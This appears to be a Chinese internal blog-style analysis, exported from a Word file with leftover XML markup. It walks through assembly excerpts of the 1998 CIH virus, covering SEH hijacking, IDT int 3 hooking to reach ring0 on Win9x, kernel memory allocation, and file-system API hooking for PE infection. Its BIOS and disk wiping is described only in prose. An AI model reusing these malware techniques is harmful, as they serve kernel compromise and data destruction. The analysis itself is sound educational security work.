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蹲坑时刷到抖音视频，大陆游客去湾湾旅游，被路边摊的大妈问大陆是不是还在用粮票，我就在想短短20多年，湾湾的网络已经退化到这种地步了吗，于是想起了湾湾那个天才少年编写的曾经的风靡一时的cih病毒，给同事们分享下它的一些实现原理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CIH简介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H病毒于1998年由湾湾23岁的大学生陈盈豪开发，据说是世界上第一款利用内核漏洞进行感染的病毒，其感染exe的方法没有利用常规的将病毒体放入pe文件的最后，而是首创了将病毒体进行拆分插入到pe的各个section的空余空间里的独特方法，同时利用了vxd驱动的能力破坏了部分型号的bios以及硬盘数据，破坏力在当时也是非常巨大的。但是这只病毒没有使用加密和变形引擎，对其进行查杀会非常简单，不过整个代码体积不到1k大小，也算不完美中的完美吧。本文分析的是CIH v1.4版本的代码，可在github上查阅。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CIH感染流程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利用漏洞进入内核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yVirusStart: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ebp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eax, [esp-04h*2]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xor ebx, ebx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xchg eax, fs:[ebx]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call @0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ebx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ecx, StopToRunVirusCode-@0[ebx]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eax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在进入内核前，病毒首先劫持了SEH异常处理的链表，fs:0保存的是SEH链表头，修改为指向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>StopToRunVirusCode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地址，当时cih仅对win9x系统进行攻击，对nt内核是没有威胁的，因为nt内核已经抛弃了vxd框架，改为现在大家熟悉的wdm。所以碰到nt内核会造成病毒进程的异常，病毒自己捕获到异常后就可以平稳退出。这里多说一下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call @0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;pop ebx这条指令组合是病毒和shellcode常用的技巧，call指令会将下一条指令的地址push到栈里，然后将下一条指令作为call的函数地址，当pop指令执行时，从栈里弹出的地址保存在ebx，所以ebx保存的就是当前指令的地址，以后就可以基于这个地址进行相对偏移计算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eax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sidt [esp-02h] ; Get IDT Base Address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ebx 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然后使用sidt指令获取当前cpu的idt基地址，注意intel处理器是允许ring3程序调用sidt指令的。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add ebx, HookExceptionNumber*08h+04h ; ZF = 0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HookExceptionNumber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是个宏，当前版本定义为3，指向的是idt表中的int 3中断处理程序，因为它要劫持中断处理程序做病毒驻留内核内存的操作，为什么要劫持int3，而不是其他中断呢？翻看intel手册你可以看到int3是调试用的单步断点中断，此时即使有其他进程使用int3指令，最多那个进程可能会crash掉，但如果劫持其他中断就可能造成内核crash，所以劫持int3是最稳妥的方案。注意idt表中的段描述符是8个字节大小，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HookExceptionNumber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要乘以0x8，后面+0x4是要提取段的基地址。intel对段描述符的定义有些奇葩，看上去很不合理，一个4字节的地址，要拆分到两个连续的4字节中的高低各2字节中，对intel保护模式不熟悉的朋友请自行查阅手册。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cli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关中断，准备劫持int3。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ebp, [ebx] ; Get Exception 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bp, [ebx-04h] ; Entry Point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如上所述，提取基地址保存在ebp的高低两字节里。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esi, MyExceptionHook-@1[ecx]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[ebx-04h], si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shr esi, 16 ; Modify Exception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[ebx+02h], si ; Entry Point Address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esi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这段代码操作是把病毒代码中的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MyExceptionHook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地址替换掉原来的段地址。注意此时病毒是在ring3中，却能修改掉ring0中的idt数据段，正常流程中intel处理器是不允许ring3直接访问ring0数据的，386处理器诞生于1985年，离当时已经过去了10多年，同时那个年底似乎也没有听到过其他操作系统有这个问题，所以不像是处理器的漏洞，那么应该是win9x的内核漏洞或vxd框架的漏洞，由于年代久远，笔者也未能google到这个漏洞的细节，如果有同事熟悉的请告知我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int HookExceptionNumber ; GenerateException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ReturnAddressOfEndException = $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调用一次int3指令，此时会跳转到病毒体的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MyExceptionHook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MyExceptionHook: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@2 = MyExceptionHook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jz InstallMyFileSystemApiHook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注意int指令调用后，当前进程已经进入了cpu的ring0空间，但是int3的中断处理程序指向了ring3的代码片段，当时intel cpu还没有smep/smap的机制，所以ring0是可以调用ring3代码的。调用int3之前，病毒代码确保了zf标志为0，所以jz这条指令此次不会跳转，继续执行后面的指令：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ecx, dr0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jecxz AllocateSystemMemoryPage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接着判断dr0寄存器是否为0，第一次执行时dr0为空（前提是没有其他驱动使用了dr0），后面病毒会将dr0置为一个hook函数地址。所以继续执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AllocateSystemMemoryPage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函数为病毒分配一个内核内存空间：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AllocateSystemMemoryPage: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dr0, ebx ; Set the Mark of My Virus Exist in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00000000fh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ecx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0ffffffffh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ecx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ecx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ecx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000000001h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000000002h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int 20h ; VMMCALL _PageAllocate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_PageAllocate = $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dd 00010053h ; Use EAX, ECX, EDX, and flags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使用int20h指令，调用vmm(virtual machine manger)函数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_PageAllocate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分配一块内存。Vxd（virtual xxx device)提供了一套虚拟硬件的执行框架，基于intel的virutal 8086模式，所以需要一个类似今天的虚拟机控制框架vmm，这个vmm微软是把它和win9x内核绑定在一起的。Intel当时还没有更高级的intel vt-x虚拟化技术。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add esp, 08h*04h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恢复之前push到栈中的参数占用的空间。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xchg edi, eax ; EDI = SystemMemory Start Address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_PageAllocate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函数返回值保存在eax里，将其与edi进行了交换，后面会看到其意图。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eax, MyVirusStart-@2[esi]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Eax置为病毒体的首地址。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iretd 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注意此时进程处于ring0中，应使用iretd返回用户空间。此时栈底的结构从高到低为ss,sp,cflags,cs,ip，ip就是iretd执行后要返回的用户态代码地址：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int HookExceptionNumber ; GenerateException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ReturnAddressOfEndException = $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esi, eax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注意iretd前，病毒将eax置为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MyVirusStart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地址，然后保存在esi中，edi在iretd之前保存了新分配的内核地址空间。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LoopOfMergeAllVirusCodeSection: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ecx, [eax-04h]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Eax-0x4的地址我们在源码之前看到有这样的定义：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FileHeader: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dd 00000000h, VirusSize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Eax-0x4保存的为病毒的代码大小。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rep movsb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将病毒代码拷贝到新分配的内核地址空间，注意此时病毒运行在ring3，却能拷贝代码到ring0中，这和之前劫持int3的动作都利用了之前提到的漏洞问题。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sub eax, 08h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esi, [eax]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or esi, esi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jz QuitLoopOfMergeAllVirusCodeSection ; ZF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jmp LoopOfMergeAllVirusCodeSection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QuitLoopOfMergeAllVirusCodeSection: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esi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Eax-0x8病毒初始化为了0，所以循环可以结束，同时zf标志位已经为1。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int HookExceptionNumber ; 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紧接着又执行了一条int3指令。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MyExceptionHook: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@2 = MyExceptionHook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jz InstallMyFileSystemApiHook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注意此时zf标志已经为1，将会调用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InstallMyFileSystemApiHook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InstallMyFileSystemApiHook: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eax, FileSystemApiHook-@6[edi]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eax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int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook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IFSMgr_InstallFileSystemApiHook = $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dd 00400067h ; Use EAX, ECX, EDX, and flags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dr0, eax ; Save OldFileSystemApiHook Address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eax ; EAX = FileSystemApiHook Address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; Save Old IFSMgr_InstallFileSystemApiHook Entry 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ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]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edx, [ecx]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OldInstallFileSystemApiHook-@3[eax], edx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; Modify IFSMgr_InstallFileSystemApiHook Entry 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eax, InstallFileSystemApiHook-@3[eax]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[ecx], eax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病毒利用了vxd的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VXDCALL IFSMgr_InstallFileSystemApiHook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函数将自身的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FileSystemApiHook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函数挂钩到了文件系统中。在当时病毒和杀毒软件，或者像windows sysinternals这种系统工具都是利用vxd的这个函数进行在win9x系统中劫持一些关键内核函数。注意nt内核不使用vxd。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cli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jmp ExitRing0Init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接着跳转到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ExitRing0Init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准备退出ring0。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ExitRing0Init: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[ebx-04h], bp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shr ebp, 16 ; Restore Exception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[ebx+02h], bp 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还记得最开始的代码中，ebp保存了原始的idt int3中断处理函数地址，现在要恢复回去，因为病毒已经驻留在内核内存中，并且挂钩了文件系统。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Iretd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iretd返回用户空间代码：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ReadyRestoreSE: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sti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此时可以开中断了。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xor ebx, ebx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jmp RestoreSE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准备恢复SEH链表头。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RestoreSE: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dword ptr fs:[ebx]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eax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在之前的栈布局中保存了原始的SEH链表头。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pop ebp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push 00401000h ; Push Original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OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack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 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然后跳转到进程的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00401000h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地址，也就是进程原始的entry point去运行。可以看到win9x系统应该没有使用aslr地址随机化技术，都是链接到固定地址。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我们还要在看下如下代码：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MyExceptionHook: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@2 = MyExceptionHook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jz InstallMyFileSystemApiHook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ecx, dr0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jecxz AllocateSystemMemoryPage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上述代码在前面已经分析过，如下代码在cih的正常初始化中是不会被调用的，但是要保证病毒的稳定性，在有其他异常时会绕过前面的代码，说明病毒初始化失败。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add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException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注意此时[esp]保存的是iretd要返回的用户空间地址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ReadyRestoreSE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前面已经分析过了，恢复SEH继续运行原始代码。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ExitRing0Init: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[ebx-04h], bp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shr ebp, 16 ; Restore Exception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[ebx+02h], bp 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Iretd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感染pe流程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在前面的病毒初始化中已经使用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FileSystemApiHook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挂钩了文件系统，对文件的任何读写操作都会被病毒捕获。传统的病毒是遍历磁盘的所有pe格式文件，cih利用了rootkit的hook方法就可以省略到那些遍历代码，这就是它自身大小不到1k的另一个原因。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后面的逻辑大概是判断当前文件类型是不是pe，如果是zip文件则忽略掉。修改文件之前保存文件属性，后续恢复。只读文件改成可写，然后恢复。将病毒体保存在pe头以及各个section中。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这些都是病毒感染的常规操作，感兴趣的同事可以自行阅读，对于不熟悉windows及pe格式的同事，也可以在笔者的博客中找到笔者为linux平台编写的病毒和加壳代码示例。 至于破坏bios和硬盘的操作基本都是利用vxd在ring0空间的优势，往bios和磁盘写垃圾数据，并没有多少技术含量对吧，但是上世纪8，90年代的病毒作者们都是一些16，7岁的小孩们，那个年纪就是叛逆啊，不写破坏性的东西，难道要他们去考可信吗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4ZDBjNDI5MWQ0OTRkNGIxZWJhY2Q4YjQwMWU1N2MifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="03DC20CE"/>
    <w:rsid w:val="040A7365"/>
    <w:rsid w:val="08395C36"/>
    <w:rsid w:val="087F3BEA"/>
    <w:rsid w:val="0DDB02BC"/>
    <w:rsid w:val="11B830D2"/>
    <w:rsid w:val="14295BA3"/>
    <w:rsid w:val="186A729E"/>
    <w:rsid w:val="19493CEA"/>
    <w:rsid w:val="1A087FCA"/>
    <w:rsid w:val="1C4252DE"/>
    <w:rsid w:val="20F4758A"/>
    <w:rsid w:val="23774E96"/>
    <w:rsid w:val="23C80126"/>
    <w:rsid w:val="267442D0"/>
    <w:rsid w:val="26CB5D43"/>
    <w:rsid w:val="288144F8"/>
    <w:rsid w:val="2C052A63"/>
    <w:rsid w:val="2D4C1E17"/>
    <w:rsid w:val="2D8C591B"/>
    <w:rsid w:val="35904E52"/>
    <w:rsid w:val="37E9450C"/>
    <w:rsid w:val="3A091C04"/>
    <w:rsid w:val="3B904609"/>
    <w:rsid w:val="46B502C1"/>
    <w:rsid w:val="4E4F3082"/>
    <w:rsid w:val="50523294"/>
    <w:rsid w:val="5CE507F8"/>
    <w:rsid w:val="5FB373B8"/>
    <w:rsid w:val="68E8739E"/>
    <w:rsid w:val="6C0A3560"/>
    <w:rsid w:val="6F592698"/>
    <w:rsid w:val="702D50EC"/>
    <w:rsid w:val="705701B1"/>
    <w:rsid w:val="72232CA4"/>
    <w:rsid w:val="7C4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2779</Words>
  <Characters>5498</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>19</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5779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2023-04-04T01:25:54Z</dcterms:created>
  <dc:creator>wzt</dc:creator>
  <cp:lastModifiedBy>wzt</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-04T03:23:17Z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D21E0EAACF054AAEBE8D15ACD7C0498F_12</vt:lpwstr>
  </property>
</Properties>
</file>